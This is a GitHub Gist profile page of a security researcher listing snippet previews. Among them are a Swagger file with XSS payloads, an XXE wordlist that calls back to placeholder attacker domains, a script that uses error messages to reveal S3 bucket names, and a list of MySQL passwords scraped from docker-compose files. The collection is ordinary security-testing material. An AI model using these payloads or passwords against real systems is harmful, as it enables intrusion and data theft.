Skip to content

Instantly share code, notes, and snippets.

View vortexau's full-sized avatar

vortex (James McLean) vortexau

View GitHub Profile
@vortexau
vortexau / decompress.ps1
Last active May 13, 2024 07:53
Powershell to decompress DEFLATE data
$base64data = "insert compressed and base64 data here"
$data = [System.Convert]::FromBase64String($base64data)
$ms = New-Object System.IO.MemoryStream
$ms.Write($data, 0, $data.Length)
$ms.Seek(0,0) | Out-Null
$sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.DeflateStream($ms, [System.IO.Compression.CompressionMode]::Decompress))
while ($line = $sr.ReadLine()) {
@vortexau
vortexau / gcp.md
Last active December 27, 2023 03:09
GCP / GCloud - Golang Private modules

Path from .git/config in origin tag something like https://source.developers.google.com/p/PROJECT/r/REPO

Set the env var like this:

go env -w GOPRIVATE=source.developers.google.com/p/<PROJECT>/r/\*

Then, go get will work, note .git extension required to work directly over git, this then uses the gcloud credential helper configured in the .git/config inside this repo,

swagger: '2.0'
securityDefinitions:
a:
type: oauth2
authorizationUrl: javascript:alert(document.domain)//
info:
version: "0.0.1"
title: Swagger UI
description: "<svg/onload=alert(1)"
paths:
@vortexau
vortexau / bucket-disclose.sh
Created October 14, 2020 22:53 — forked from fransr/bucket-disclose.sh
Using error messages to decloak an S3 bucket. Uses soap, unicode, post, multipart, streaming and index listing as ways of figure it out. You do need a valid aws-key (never the secret) to properly get the error messages
#!/bin/bash
# Written by Frans Rosén (twitter.com/fransrosen)
_debug="$2" #turn on debug
_timeout="20"
#you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key
_aws_key="AKIA..."
H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3"
H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36"
@vortexau
vortexau / xxe-payloads.txt
Created September 24, 2020 07:17 — forked from honoki/xxe-payloads.txt
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
@vortexau
vortexau / get-shodan-favicon-hash.py
Created September 3, 2020 22:54 — forked from yehgdotnet/get-shodan-favicon-hash.py
Get Shodan FAVICON Hash
# https://twitter.com/brsn76945860/status/1171233054951501824
pip install mmh3
-----------------------------
# python 2
import mmh3
import requests
response = requests.get('https://cybersecurity.wtf/favicon.ico')
favicon = response.content.encode('base64')
@vortexau
vortexau / passwords.txt
Created September 9, 2019 13:01 — forked from tomnomnom/passwords.txt
MySQL Docker Passwords pulled from docker-compose.yml files
!23qweASD
0Z0mQ130F65E8wD
123
1234
123456
12345678
123456789
1234root5678
123plop321
132vaslliwemvljm9
@vortexau
vortexau / google-copy.js
Created June 19, 2019 21:31 — forked from tomnomnom/google-copy.js
Bookmarklet to copy URLs from a Google search results page
javascript:d=document;b=d.createElement`textarea`;c=d.getSelection();b.textContent=[...d.querySelectorAll`div.r>a:first-child`].map(n=>n.href).join`\n`;d.body.appendChild(b);c.removeAllRanges();b.select();d.execCommand`copy`;d.body.removeChild(b)
@vortexau
vortexau / xamarin-host-ssh.py
Created November 7, 2017 00:12
Xamarin Mac Host SSH Connection
#!/usr/bin/env python
import paramiko
import base64
# Run in /mnt/c/Users/<username>/AppData/Local/Xamarin/MonoTouch
# Unfortunately this does NOT work yet, as I do not understand the passphrase.key
# file contents entirely (it appears to be bytes inside the base64 encoded string)
# and how to use it as the SSH key.
with open("passphrase.key", 'r') as file: